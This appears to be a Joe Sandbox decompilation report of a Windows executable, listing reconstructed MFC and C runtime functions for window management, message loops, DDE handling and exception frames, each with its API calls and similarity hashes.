                  				int _t68;
                  				intOrPtr* _t74;
                  
                  				_t64 = __ecx;
                  				_push(__ecx);
                  				_t74 = __ecx;
                  				_t66 = E0040ED5B(__ecx);
                  				_v8 = _t66;
                  				if(_t66 == 0) {
                  					E00413DD0(_t64);
                  				}
                  				_t65 =  *((intOrPtr*)(_t74 + 0x80));
                  				_t62 = _a8;
                  				_t68 = _a4;
                  				if(_t65 == 0) {
                  					L5:
                  					if(_t62 != 0xffff) {
                  						_t45 = _t74 + 0xdc;
                  						if( *_t45 != 0) {
                  							 *_t45 =  *_t45 & 0x00000000;
                  							if((_t62 & 0x00002000) != 0 && ( *(_t74 + 0xd0) & 0x00000001) == 0) {
                  								_t65 = _t74;
                  								 *((intOrPtr*)( *_t74 + 0x160))(2);
                  								_t66 = _v8;
                  							}
                  						}
                  						if(_t68 == 0 || (_t62 & 0x00000810) != 0) {
                  							 *(_t74 + 0xa8) =  *(_t74 + 0xa8) & 0x00000000;
                  							goto L29;
                  						} else {
                  							if(_t68 - 0xf000 > 0x1ef) {
                  								if(_t68 < 0xff00) {
                  									L25:
                  									 *(_t74 + 0xa8) = _t68;
                  									L29:
                  									 *(_t66 + 0x3c) =  *(_t66 + 0x3c) | 0x00000040;
                  									L30:
                  									_t46 =  *(_t74 + 0xa8);
                  									if(_t46 !=  *((intOrPtr*)(_t74 + 0xac))) {
                  										_t46 = E0040E20E(_t62, _t65, GetParent( *(_t74 + 0x20)));
                  										if(_t46 != 0) {
                  											_t46 = PostMessageW( *(_t74 + 0x20), 0x36a, 0, 0);
                  										}
                  									}
                  									L33:
                  									return _t46;
                  								}
                  								 *(_t74 + 0xa8) = 0xef1f;
                  								goto L29;
                  							}
                  							_t68 = (_t68 + 0xffff1000 >> 4) + 0xef00;
                  							goto L25;
                  						}
                  					}
                  					 *(_t74 + 0x3c) =  *(_t74 + 0x3c) & 0xffffffbf;
                  					if( *((intOrPtr*)(_t66 + 0x68)) != 0) {
                  						 *(_t74 + 0xa8) = 0xe002;
                  					} else {
                  						 *(_t74 + 0xa8) = 0xe001;
                  					}
                  					SendMessageW( *(_t74 + 0x20), 0x362,  *(_t74 + 0xa8), 0);
                  					_t65 = _t74;
                  					_t53 =  *((intOrPtr*)( *_t74 + 0x16c))();
                  					if(_t53 != 0) {
                  						UpdateWindow( *(_t53 + 0x20));
                  					}
                  					if(_a12 == 0 && ( *(_t74 + 0xd0) & 0x00000001) == 0 && GetKeyState(0x79) >= 0 && GetKeyState(0x12) >= 0 &&  *((intOrPtr*)(_t74 + 0xe0)) == 0) {
                  						_t65 = _t74;
                  						 *((intOrPtr*)( *_t74 + 0x160))(2);
                  					}
                  					goto L30;
                  				}
                  				_t46 =  *((intOrPtr*)( *_t65 + 0x7c))(_t68, _t62, _a12);
                  				if(_t46 != 0) {
                  					goto L33;
                  				} else {
                  					_t66 = _v8;
                  					goto L5;
                  				}
                  			}

                  APIs
                  • SendMessageW.USER32(?,00000362,0000E002,00000000), ref: 00416C08
                  • UpdateWindow.USER32(?), ref: 00416C1F
                  • GetKeyState.USER32(00000079), ref: 00416C44
                  • GetKeyState.USER32(00000012), ref: 00416C51
                  • GetParent.USER32(?), ref: 00416D05
                  • PostMessageW.USER32(?,0000036A,00000000,00000000), ref: 00416D21
                    • Part of subcall function 00413DD0: __CxxThrowException@8.LIBCMT ref: 00413DE6
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: MessageState$Exception@8ParentPostSendThrowUpdateWindow
                  • String ID:
                  • API String ID: 3830675576-0
                  • Opcode ID: d101b92d838daa0fa9edb1664063b490d2432b5ef523112fcfbbe748e38d08d7
                  • Instruction ID: 57fd262867cade702ce7148582579a2154035acfea75e6112e856d4255c21794
                  • Opcode Fuzzy Hash: d101b92d838daa0fa9edb1664063b490d2432b5ef523112fcfbbe748e38d08d7
                  • Instruction Fuzzy Hash: 7041B3712007059FEB208F20C848BEBB7A5FF54315F12846EE8DA56291EBB9E880CB55
                  Uniqueness

                  Uniqueness Score: 1.31%

                  C-Code - Quality: 81%
                  			E00425168(void* __ecx, intOrPtr __edx) {
                  				intOrPtr _v8;
                  				struct tagMSG _v32;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				void* _t30;
                  				void* _t32;
                  				void* _t34;
                  				void* _t36;
                  				intOrPtr* _t37;
                  				void* _t41;
                  				intOrPtr _t53;
                  				void* _t54;
                  				void* _t56;
                  				void* _t57;
                  				intOrPtr* _t58;
                  
                  				_t55 = __edx;
                  				_t51 = __ecx;
                  				_t56 = GetCapture;
                  				_t57 = __ecx;
                  				if(GetCapture() != 0) {
                  					L20:
                  					return 0;
                  				}
                  				E0040E20E(0, _t51, SetCapture( *( *((intOrPtr*)(_t57 + 0x68)) + 0x20)));
                  				if(E0040E20E(0, _t51, GetCapture()) !=  *((intOrPtr*)(_t57 + 0x68))) {
                  					L19:
                  					E00424FD8(0, _t57, _t68);
                  					goto L20;
                  				} else {
                  					while(GetMessageW( &_v32, 0, 0, 0) != 0) {
                  						_t30 = _v32.message - 0x100;
                  						if(_t30 == 0) {
                  							__eflags =  *((intOrPtr*)(_t57 + 0x88));
                  							if( *((intOrPtr*)(_t57 + 0x88)) != 0) {
                  								_t51 = _t57;
                  								E00424E2C(_t57, _v32.wParam, 1);
                  							}
                  							__eflags = _v32.wParam - 0x1b;
                  							if(__eflags != 0) {
                  								L18:
                  								_t32 = E0040E20E(0, _t51, GetCapture());
                  								_t68 = _t32 -  *((intOrPtr*)(_t57 + 0x68));
                  								if(_t32 ==  *((intOrPtr*)(_t57 + 0x68))) {
                  									continue;
                  								}
                  							}
                  							goto L19;
                  						}
                  						_t34 = _t30 - 1;
                  						if(_t34 == 0) {
                  							__eflags =  *((intOrPtr*)(_t57 + 0x88));
                  							if(__eflags != 0) {
                  								_t51 = _t57;
                  								E00424E2C(_t57, _v32.wParam, 0);
                  							}
                  							goto L18;
                  						}
                  						_t36 = _t34 - 0xff;
                  						if(_t36 == 0) {
                  							_t53 = _v32.pt;
                  							_t55 = _v8;
                  							__eflags =  *((intOrPtr*)(_t57 + 0x88));
                  							_push(_t53);
                  							_push(_t53);
                  							_t37 = _t58;
                  							 *_t37 = _t53;
                  							 *((intOrPtr*)(_t37 + 4)) = _v8;
                  							_t51 = _t57;
                  							if( *((intOrPtr*)(_t57 + 0x88)) == 0) {
                  								E00424E62(_t51, _t56);
                  							} else {
                  								E00424DB7(_t51);
                  							}
                  							goto L18;
                  						}
                  						_t41 = _t36;
                  						if(_t41 == 0) {
                  							_t54 = _t57;
                  							__eflags =  *((intOrPtr*)(_t57 + 0x88));
                  							if(__eflags == 0) {
                  								E00425121(0, _t54, __eflags);
                  							} else {
                  								E0042501B(_t54, _t55, _t56, _t57, __eflags);
                  							}
                  							return 1;
                  						}
                  						if(_t41 == 0) {
                  							goto L19;
                  						}
                  						DispatchMessageW( &_v32);
                  						goto L18;
                  					}
                  					_push(_v32.wParam);
                  					E0041CD10();
                  					goto L19;
                  				}
                  			}

                  APIs
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: Capture$Message$Dispatch
                  • String ID:
                  • API String ID: 3654672037-0
                  • Opcode ID: 230859865490aac894e54a27b38a5e0f56adc41e66776a2f96609ea66a640a14
                  • Instruction ID: d206bd30ddddd924d114909a91c140b9e49460e59ca5c144d558be76b45dd6da
                  • Opcode Fuzzy Hash: 230859865490aac894e54a27b38a5e0f56adc41e66776a2f96609ea66a640a14
                  • Instruction Fuzzy Hash: B831B731700925DBDB24ABF5A84997F76A8EB80344F90486FE442E22D1CA3C9C41DE7A
                  Uniqueness

                  Uniqueness Score: 1.31%

                  C-Code - Quality: 100%
                  			E0041A680(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
                  				intOrPtr* _t78;
                  				void* _t79;
                  				void* _t80;
                  
                  				_t80 = __eflags;
                  				E0042922B(E00439716, __ebx, __edi, __esi);
                  				_t78 = __ecx;
                  				E0041478D(__ebx, _t79 - 0x40, __edi, __ecx, _t80);
                  				 *(_t79 - 4) =  *(_t79 - 4) & 0x00000000;
                  				GetClientRect( *(_t78 + 0x20), _t79 - 0x2c);
                  				GetWindowRect( *(_t78 + 0x20), _t79 - 0x1c);
                  				E004144FC(_t78, _t79 - 0x1c);
                  				OffsetRect(_t79 - 0x2c,  ~( *(_t79 - 0x1c)),  ~( *(_t79 - 0x18)));
                  				E00413FFC(_t79 - 0x40, _t79 - 0x2c);
                  				OffsetRect(_t79 - 0x1c,  ~( *(_t79 - 0x1c)),  ~( *(_t79 - 0x18)));
                  				 *((intOrPtr*)( *_t78 + 0x150))(_t79 - 0x40, _t79 - 0x1c, __ecx, 0x34);
                  				E00414043(_t79 - 0x40, _t79 - 0x1c);
                  				SendMessageW( *(_t78 + 0x20), 0x14,  *(_t79 - 0x3c), 0);
                  				 *((intOrPtr*)( *_t78 + 0x158))(_t79 - 0x40, _t79 - 0x1c);
                  				 *(_t79 - 4) =  *(_t79 - 4) | 0xffffffff;
                  				return E00429303(E004147E1(__ebx, _t79 - 0x40, OffsetRect, _t78,  *(_t79 - 4)));
                  			}

                  APIs
                  • __EH_prolog3.LIBCMT ref: 004234B8
                    • Part of subcall function 0041478D: __EH_prolog3.LIBCMT ref: 00414794
                    • Part of subcall function 0041478D: GetWindowDC.USER32(00000000), ref: 004147C0
                  • GetClientRect.USER32(?,?), ref: 004234D3
                  • GetWindowRect.USER32(?,?), ref: 004234E0
                    • Part of subcall function 004144FC: ScreenToClient.USER32(?,00000000), ref: 0041450D
                    • Part of subcall function 004144FC: ScreenToClient.USER32(?,00000008), ref: 0041451A
                  • OffsetRect.USER32(?,?,?), ref: 00423507
                    • Part of subcall function 00413FFC: ExcludeClipRect.GDI32(?,?,?,?,?), ref: 00414025
                    • Part of subcall function 00413FFC: ExcludeClipRect.GDI32(?,?,?,?,?), ref: 0041403A
                  • OffsetRect.USER32(?,?,?), ref: 00423525
                    • Part of subcall function 00414043: IntersectClipRect.GDI32(?,?,?,?,?), ref: 0041406C
                    • Part of subcall function 00414043: IntersectClipRect.GDI32(?,?,?,?,?), ref: 00414081
                  • SendMessageW.USER32(?,00000014,?,00000000), ref: 0042354F
                    • Part of subcall function 004147E1: __EH_prolog3.LIBCMT ref: 004147E8
                    • Part of subcall function 004147E1: ReleaseDC.USER32(?,00000000), ref: 00414805
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: Rect$Clip$ClientH_prolog3$ExcludeIntersectOffsetScreenWindow$MessageReleaseSend
                  • String ID:
                  • API String ID: 2952362992-0
                  • Opcode ID: 6fed628b89d2a2e1b305be27e03326f1b10bfb88e14ea84e6eb177eacea98780
                  • Instruction ID: 8311e8cd8048544a21e1c01b20f670841aaf83e46b2aef2157f9198ec98204d3
                  • Opcode Fuzzy Hash: 6fed628b89d2a2e1b305be27e03326f1b10bfb88e14ea84e6eb177eacea98780
                  • Instruction Fuzzy Hash: 7621EA72D1001AEFCF19EB94DC59DEEB3B8FF58314F00411AF552A71A1DB686A06CB64
                  Uniqueness

                  Uniqueness Score: 3.15%

                  C-Code - Quality: 100%
                  			E00413A14(struct HWND__* _a4, struct HWND__** _a8) {
                  				struct HWND__* _t8;
                  				void* _t14;
                  				struct HWND__** _t16;
                  				struct HWND__* _t17;
                  				struct HWND__* _t18;
                  
                  				_t18 = _a4;
                  				if(_t18 != 0) {
                  					L5:
                  					if((GetWindowLongW(_t18, 0xfffffff0) & 0x40000000) == 0) {
                  						L8:
                  						_t17 = _t18;
                  						_t8 = _t18;
                  						if(_t18 == 0) {
                  							L10:
                  							if(_a4 == 0 && _t18 != 0) {
                  								_t18 = GetLastActivePopup(_t18);
                  							}
                  							_t16 = _a8;
                  							if(_t16 != 0) {
                  								if(_t17 == 0 || IsWindowEnabled(_t17) == 0 || _t17 == _t18) {
                  									 *_t16 =  *_t16 & 0x00000000;
                  								} else {
                  									 *_t16 = _t17;
                  									EnableWindow(_t17, 0);
                  								}
                  							}
                  							return _t18;
                  						} else {
                  							goto L9;
                  						}
                  						do {
                  							L9:
                  							_t17 = _t8;
                  							_t8 = GetParent(_t8);
                  						} while (_t8 != 0);
                  						goto L10;
                  					}
                  					_t18 = GetParent(_t18);
                  					L7:
                  					if(_t18 != 0) {
                  						goto L5;
                  					}
                  					goto L8;
                  				}
                  				_t14 = E004139CF();
                  				if(_t14 != 0) {
                  					L4:
                  					_t18 =  *(_t14 + 0x20);
                  					goto L7;
                  				}
                  				_t14 = E0040CC4F();
                  				if(_t14 != 0) {
                  					goto L4;
                  				}
                  				_t18 = 0;
                  				goto L8;
                  			}









                  APIs
                  • GetWindowLongW.USER32(?,000000F0), ref: 00413A47
                  • GetParent.USER32(?), ref: 00413A55
                  • GetParent.USER32(?), ref: 00413A68
                  • GetLastActivePopup.USER32(?), ref: 00413A79
                  • IsWindowEnabled.USER32(?), ref: 00413A8D
                  • EnableWindow.USER32(?,00000000), ref: 00413AA0
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
                  • String ID:
                  • API String ID: 670545878-0
                  Uniqueness

                  Uniqueness Score: 0.16%

                  C-Code - Quality: 92%
                  			E00415740(intOrPtr __ecx, intOrPtr _a4) {
                  				intOrPtr _v8;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				struct HWND__* _t17;
                  				signed int _t22;
                  				void* _t28;
                  				struct HWND__* _t32;
                  				void* _t34;
                  
                  				_t30 = __ecx;
                  				_push(__ecx);
                  				_v8 = __ecx;
                  				_t17 = GetWindow(GetDesktopWindow(), 5);
                  				_t32 = _t17;
                  				_t36 = _t32;
                  				if(_t32 == 0) {
                  					L14:
                  					return _t17;
                  				} else {
                  					_t28 = ShowWindow;
                  					_push(_t34);
                  					do {
                  						_t34 = E0040E23A(_t28, _t30, _t32, _t34, _t36, _t32);
                  						if(_t34 != 0) {
                  							_t20 =  *((intOrPtr*)(_v8 + 0x20));
                  							if( *((intOrPtr*)(_v8 + 0x20)) != _t32 && E004156A7(_t20, _t32) != 0) {
                  								_t22 = GetWindowLongW(_t32, 0xfffffff0);
                  								if(_a4 != 0) {
                  									__eflags = _t22 & 0x18000000;
                  									if(__eflags == 0) {
                  										__eflags =  *(_t34 + 0x3c) & 0x00000002;
                  										if(__eflags != 0) {
                  											__eflags =  *(_v8 + 0xb4);
                  											if(__eflags == 0) {
                  												ShowWindow(_t32, 4);
                  												_t14 = _t34 + 0x3c;
                  												 *_t14 =  *(_t34 + 0x3c) & 0xfffffffd;
                  												__eflags =  *_t14;
                  											}
                  										}
                  									}
                  								} else {
                  									if((_t22 & 0x18000000) == 0x10000000) {
                  										ShowWindow(_t32, 0);
                  										 *(_t34 + 0x3c) =  *(_t34 + 0x3c) | 0x00000002;
                  									}
                  								}
                  							}
                  						}
                  						_t17 = GetWindow(_t32, 2);
                  						_t32 = _t17;
                  					} while (_t32 != 0);
                  					goto L14;
                  				}
                  			}













                  APIs
                  • GetDesktopWindow.USER32 ref: 0041574C
                  • GetWindow.USER32(00000000), ref: 00415753
                  • GetWindowLongW.USER32(00000000,000000F0), ref: 0041578F
                  • ShowWindow.USER32(00000000,00000000), ref: 004157AA
                  • ShowWindow.USER32(00000000,00000004), ref: 004157CE
                  • GetWindow.USER32(00000000,00000002), ref: 004157D7
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: Window$Show$DesktopLong
                  • String ID:
                  • API String ID: 3178490500-0
                  Uniqueness

                  Uniqueness Score: 0.53%

                  C-Code - Quality: 72%
                  			E00424B98(void* __ecx) {
                  				struct tagMSG _v32;
                  				void* __ebx;
                  				int _t20;
                  				intOrPtr _t23;
                  				int _t30;
                  				intOrPtr _t31;
                  				void* _t32;
                  				void* _t33;
                  				void* _t36;
                  				void* _t38;
                  
                  				_t32 = PeekMessageW;
                  				_t38 = __ecx;
                  				while(PeekMessageW( &_v32, 0, 0xf, 0xf, 0) != 0) {
                  					_t20 = GetMessageW( &_v32, 0, 0xf, 0xf);
                  					if(_t20 != 0) {
                  						DispatchMessageW( &_v32);
                  						continue;
                  					}
                  					return _t20;
                  				}
                  				_t23 =  *((intOrPtr*)(_t38 + 0x68));
                  				 *((intOrPtr*)(_t38 + 0x70)) =  *((intOrPtr*)(_t23 + 0x88));
                  				 *(_t38 + 0x78) =  *(_t23 + 0x84) & 0x0000f000;
                  				SetRectEmpty(_t38 + 0xc);
                  				 *((intOrPtr*)(_t38 + 0x20)) = 0;
                  				 *((intOrPtr*)(_t38 + 0x1c)) = 0;
                  				 *((intOrPtr*)(_t38 + 0x24)) = 0;
                  				 *((intOrPtr*)(_t38 + 0x7c)) = 0;
                  				 *((intOrPtr*)(_t38 + 0x80)) = 0;
                  				_t33 = E0040E20E(_t32,  *((intOrPtr*)(_t23 + 0x88)), GetDesktopWindow());
                  				_t30 = LockWindowUpdate( *(_t33 + 0x20));
                  				_t36 = _t33;
                  				if(_t30 == 0) {
                  					_push(3);
                  				} else {
                  					_push(0x403);
                  				}
                  				_push(0);
                  				_t31 = E004249CB(_t36);
                  				 *((intOrPtr*)(_t38 + 0x84)) = _t31;
                  				return _t31;
                  			}














                  APIs
                  • GetMessageW.USER32(?,00000000,0000000F,0000000F), ref: 00424BB8
                  • DispatchMessageW.USER32(?), ref: 00424BCA
                  • PeekMessageW.USER32(?,00000000,0000000F,0000000F,00000000), ref: 00424BDA
                  • SetRectEmpty.USER32(?), ref: 00424BFE
                  • GetDesktopWindow.USER32 ref: 00424C16
                  • LockWindowUpdate.USER32(?), ref: 00424C27
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: Message$Window$DesktopDispatchEmptyLockPeekRectUpdate
                  • String ID:
                  • API String ID: 1192691108-0
                  Uniqueness

                  Uniqueness Score: 8.94%

                  C-Code - Quality: 60%
                  			E004183AB(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
                  				void* _t28;
                  				long _t31;
                  				void* _t33;
                  				void* _t38;
                  				void* _t58;
                  				void* _t59;
                  
                  				_push(0x18);
                  				E0042925E(E00438FFC, __ebx, __edi, __esi);
                  				 *((intOrPtr*)(_t59 - 0x1c)) = __ecx;
                  				_push(_t59 - 0x18);
                  				_push(_t59 - 0x20);
                  				_push( *((intOrPtr*)(_t59 + 0xc)));
                  				_push(0x3e8);
                  				L00437B5A();
                  				_t28 = GlobalLock( *(_t59 - 0x18));
                  				E00404820(_t59 - 0x14);
                  				 *(_t59 - 4) =  *(_t59 - 4) & 0x00000000;
                  				 *(_t59 - 4) = 1;
                  				E00405C40(_t59 - 0x14, _t28);
                  				_t31 = GlobalUnlock( *(_t59 - 0x18));
                  				 *(_t59 - 4) =  *(_t59 - 4) & 0x00000000;
                  				_push( *(_t59 - 0x18));
                  				_push(0x8000);
                  				_push(0x3e4);
                  				_push(0x3e8);
                  				_push( *((intOrPtr*)(_t59 + 0xc)));
                  				L00437B54();
                  				_t54 =  *((intOrPtr*)(_t59 - 0x1c));
                  				PostMessageW( *(_t59 + 8), 0x3e4,  *( *((intOrPtr*)(_t59 - 0x1c)) + 0x20), _t31);
                  				_t33 = E00411E53( *((intOrPtr*)(_t59 - 0x1c)));
                  				_t61 = _t33;
                  				if(_t33 != 0) {
                  					_t58 = E00412509(_t59 - 0x14);
                  					_t38 = E0042083D(__ebx, _t54, _t58, _t61);
                  					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t38 + 4)))) + 0xa0))(_t58);
                  					E0040E100(__ebx, _t59 - 0x14, _t54, 0xffffffff);
                  				}
                  				E004055F0( *((intOrPtr*)(_t59 - 0x14)) + 0xfffffff0);
                  				return E00429303(0);
                  			}










                  APIs
                  • __EH_prolog3_catch.LIBCMT ref: 004183B2
                  • UnpackDDElParam.USER32(000003E8,?,?,?), ref: 004183CA
                  • GlobalLock.KERNEL32(?,00000018), ref: 004183D2
                  • GlobalUnlock.KERNEL32(?,00000000), ref: 004183F6
                  • ReuseDDElParam.USER32(?,000003E8,000003E4,00008000,?), ref: 00418416
                  • PostMessageW.USER32(?,000003E4,?,00000000), ref: 00418426
                    • Part of subcall function 00411E53: IsWindowEnabled.USER32(?), ref: 00411E5C
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: GlobalParam$EnabledH_prolog3_catchLockMessagePostReuseUnlockUnpackWindow
                  • String ID:
                  • API String ID: 4187826474-0
                  Uniqueness

                  Uniqueness Score: 1.31%

                  C-Code - Quality: 100%
                  			E00420B28(struct HWND__* _a4) {
                  				void* __ebx;
                  				void* __edi;
                  				struct HWND__* _t3;
                  				struct HWND__* _t6;
                  				struct HWND__* _t8;
                  				void* _t10;
                  				struct HWND__* _t11;
                  
                  				_t3 = GetFocus();
                  				_t11 = _t3;
                  				if(_t11 != 0) {
                  					_t8 = _a4;
                  					if(_t11 == _t8) {
                  						L10:
                  						return _t3;
                  					}
                  					if(E00420A0C(_t8, _t10, _t11, _t11, 3) != 0) {
                  						L5:
                  						if(_t8 == 0 || (GetWindowLongW(_t8, 0xfffffff0) & 0x40000000) == 0) {
                  							L8:
                  							_t3 = SendMessageW(_t11, 0x14f, 0, 0);
                  							goto L9;
                  						} else {
                  							_t6 = GetParent(_t8);
                  							_t3 = GetDesktopWindow();
                  							if(_t6 == _t3) {
                  								L9:
                  								goto L10;
                  							}
                  							goto L8;
                  						}
                  					}
                  					_t3 = GetParent(_t11);
                  					_t11 = _t3;
                  					if(_t11 == _t8) {
                  						goto L9;
                  					}
                  					_t3 = E00420A0C(_t8, _t10, _t11, _t11, 2);
                  					if(_t3 == 0) {
                  						goto L9;
                  					}
                  					goto L5;
                  				}
                  				return _t3;
                  			}











                  APIs
                  • GetFocus.USER32 ref: 00420B2E
                  • GetParent.USER32(00000000), ref: 00420B56
                    • Part of subcall function 00420A0C: GetWindowLongW.USER32(00000000,000000F0), ref: 00420A2D
                    • Part of subcall function 00420A0C: GetClassNameW.USER32(00000000,?,0000000A), ref: 00420A42
                  • GetWindowLongW.USER32(?,000000F0), ref: 00420B71
                  • GetParent.USER32(?), ref: 00420B7F
                  • GetDesktopWindow.USER32 ref: 00420B83
                  • SendMessageW.USER32(00000000,0000014F,00000000,00000000), ref: 00420B97
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: Window$LongParent$ClassDesktopFocusMessageNameSend
                  • String ID:
                  • API String ID: 3020784601-0
                  Uniqueness

                  Uniqueness Score: 0.45%

                  C-Code - Quality: 90%
                  			E0042CA56(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                  				intOrPtr _t48;
                  				intOrPtr _t57;
                  				void* _t58;
                  				void* _t61;
                  
                  				_t61 = __eflags;
                  				_t53 = __edx;
                  				_push(0x2c);
                  				_push(0x447d08);
                  				E00429338(__ebx, __edi, __esi);
                  				_t48 = __ecx;
                  				_t55 =  *((intOrPtr*)(_t58 + 0xc));
                  				_t57 =  *((intOrPtr*)(_t58 + 8));
                  				 *((intOrPtr*)(_t58 - 0x1c)) = __ecx;
                  				 *(_t58 - 0x34) =  *(_t58 - 0x34) & 0x00000000;
                  				 *((intOrPtr*)(_t58 - 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t58 + 0xc)) - 4));
                  				 *((intOrPtr*)(_t58 - 0x28)) = E00427CFA(_t58 - 0x3c,  *((intOrPtr*)(_t57 + 0x18)));
                  				 *((intOrPtr*)(_t58 - 0x2c)) =  *((intOrPtr*)(E0042C35A(__ecx, __edx, _t55, _t61) + 0x88));
                  				 *((intOrPtr*)(_t58 - 0x30)) =  *((intOrPtr*)(E0042C35A(_t48, __edx, _t55, _t61) + 0x8c));
                  				 *((intOrPtr*)(E0042C35A(_t48, _t53, _t55, _t61) + 0x88)) = _t57;
                  				 *((intOrPtr*)(E0042C35A(_t48, _t53, _t55, _t61) + 0x8c)) =  *((intOrPtr*)(_t58 + 0x10));
                  				 *(_t58 - 4) =  *(_t58 - 4) & 0x00000000;
                  				 *((intOrPtr*)(_t58 + 0x10)) = 1;
                  				 *(_t58 - 4) = 1;
                  				 *((intOrPtr*)(_t58 - 0x1c)) = E00427D9F(_t55,  *((intOrPtr*)(_t58 + 0x14)), _t48,  *((intOrPtr*)(_t58 + 0x18)),  *((intOrPtr*)(_t58 + 0x1c)));
                  				 *(_t58 - 4) =  *(_t58 - 4) & 0x00000000;
                  				 *(_t58 - 4) = 0xfffffffe;
                  				 *((intOrPtr*)(_t58 + 0x10)) = 0;
                  				E0042CB7C(_t48, _t53, _t55, _t57, _t61);
                  				return E0042937D( *((intOrPtr*)(_t58 - 0x1c)));
                  			}








                  APIs
                  • __CreateFrameInfo.LIBCMT ref: 0042CA7E
                    • Part of subcall function 00427CFA: __getptd.LIBCMT ref: 00427D08
                    • Part of subcall function 00427CFA: __getptd.LIBCMT ref: 00427D16
                  • __getptd.LIBCMT ref: 0042CA88
                    • Part of subcall function 0042C35A: __getptd_noexit.LIBCMT ref: 0042C35D
                    • Part of subcall function 0042C35A: __amsg_exit.LIBCMT ref: 0042C36A
                  • __getptd.LIBCMT ref: 0042CA96
                  • __getptd.LIBCMT ref: 0042CAA4
                  • __getptd.LIBCMT ref: 0042CAAF
                  • _CallCatchBlock2.LIBCMT ref: 0042CAD5
